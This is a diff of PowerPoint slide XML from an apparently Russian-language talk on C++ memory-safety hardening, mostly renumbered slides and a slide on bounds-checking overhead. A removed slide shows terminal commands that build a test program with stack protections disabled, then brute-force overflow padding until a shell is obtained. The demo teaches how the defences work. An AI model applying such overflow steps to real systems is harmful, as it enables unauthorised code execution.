-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>$ CFLAGS=‘-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>Wl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>,-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>z,execstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fno</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-stack-protector –w’</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>$ PAD=</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>$ for </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> in `seq 1 128`; do</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  echo PAD=$</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>gcc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -m32 -DPAD="\"$PAD\"" -march=i686 $CFLAGS </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>repro.c</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>setarch</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -R env -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> ./</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>a.out</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>  PAD="$PAD\\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>xff</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>"</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>done</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>PAD=1</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>PAD=2</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>PAD=3</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>...</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>PAD=20</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>Segmentation fault (core dumped)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>PAD=21</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>Segmentation fault (core dumped)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>...</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>PAD=25</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>$   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t># </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>Получен доступ к </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>shell</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="798697827"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide30.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide31.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -10485,7 +10735,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide31.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide32.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -10783,7 +11033,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide32.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide33.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -11198,7 +11448,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide33.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide34.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -11435,7 +11685,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide34.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide35.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -11636,7 +11886,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide35.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide36.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -11723,7 +11973,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide36.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide37.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -12266,7 +12516,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide37.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide38.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -12495,7 +12745,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide38.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide39.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -12736,180 +12986,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4273378519"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide39.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A02C0F-41DC-49BC-A14D-3051ED4CE53C}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Недостатки</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{496C18CC-BA28-4CDF-88FE-D72E797CA297}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Накладные расходы</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>0.3% в серверных приложениях Google</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Retrofitting spatial safety to hundreds of millions of lines of C++</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>Только при условии включённых ThinLTO и PGO</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>, иначе </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>1-2%</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>3.5% при компиляции </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CGBuiltin.cpp </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>компилятором Clang</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>F</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>alse negatives:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Покрывает только подмножество ошибок (некорректные индексы, только STL)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Некоторые ошибки обнаруживать слишком дорого (например ошибки в итераторах)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4092177488"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -13215,6 +13291,180 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A02C0F-41DC-49BC-A14D-3051ED4CE53C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Недостатки</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{496C18CC-BA28-4CDF-88FE-D72E797CA297}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
